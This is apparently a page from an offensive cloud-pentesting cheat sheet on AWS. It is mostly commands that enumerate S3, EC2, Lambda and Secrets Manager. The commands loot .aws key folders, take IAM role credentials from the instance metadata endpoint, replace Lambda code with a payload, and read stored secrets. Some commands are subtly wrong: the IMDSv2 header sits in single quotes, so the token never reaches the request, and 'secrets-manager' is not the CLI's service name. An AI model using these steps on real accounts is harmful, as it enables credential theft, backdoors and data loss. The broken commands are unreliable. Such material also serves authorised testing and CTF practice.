IAM and Resource Attacks

S3

aws s3 ls
aws s3 ls s3://bucket # Use --no-sign-request  for unauthenticated buckets.
aws s3 cp s3://bucket/flag.txt .

EC2

IAM permissions over EC2s may allow you to execute commands, dump snapshots, and impersonate associated IAM roles. Make sure to loot the EC2's root and user .aws folders for keys.

# List EC2 main info and role
aws ec2 describe-instances --query "Reservations[*].Instances[*].[InstanceId,PublicIpAddress,State.Name,KeyName,IamInstanceProfile.Arn]"

# Network access
aws ec2 describe-security-groups
aws ec2 describe-network-interfaces

# IAM roles on EC2
aws ec2 describe-instances --query "Reservations[*].Instances[*].IamInstanceProfile.Arn"

Access keys may of course be obtained from the AWS IMDS via web requests from the EC2:

# Check for /iam/ -> Role assigned
curl http://169.254.169.254/latest/meta-data

# IMDSv1
curl http://169.254.169.254/latest/meta-data/iam/info
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME

# IMDSv2 - Get Token
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
curl -s -f -H '$HEADER' http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME

Lambda

aws lambda list-functions --region us-east-1

# Config and source
aws lambda get-function-configuration --function-name [function-name]
aws lambda get-function --function-name [function-name]

# Invocation
aws lambda invoke --function-name [function-name] output.json --payload '{"key": "value"}'

# Update
aws lambda update-function-code --function-name [function-name] --zip-file fileb://payload.zip
aws lambda update-function-configuration --function-name [function-name] --environment "Variables={VAR=value}"

Secrets Manager

aws secrets-manager list-secrets
aws secrets-manager get-secret-value --secret-id 'arn:aws...'
PreviousEnumerationNextGCP

Last updated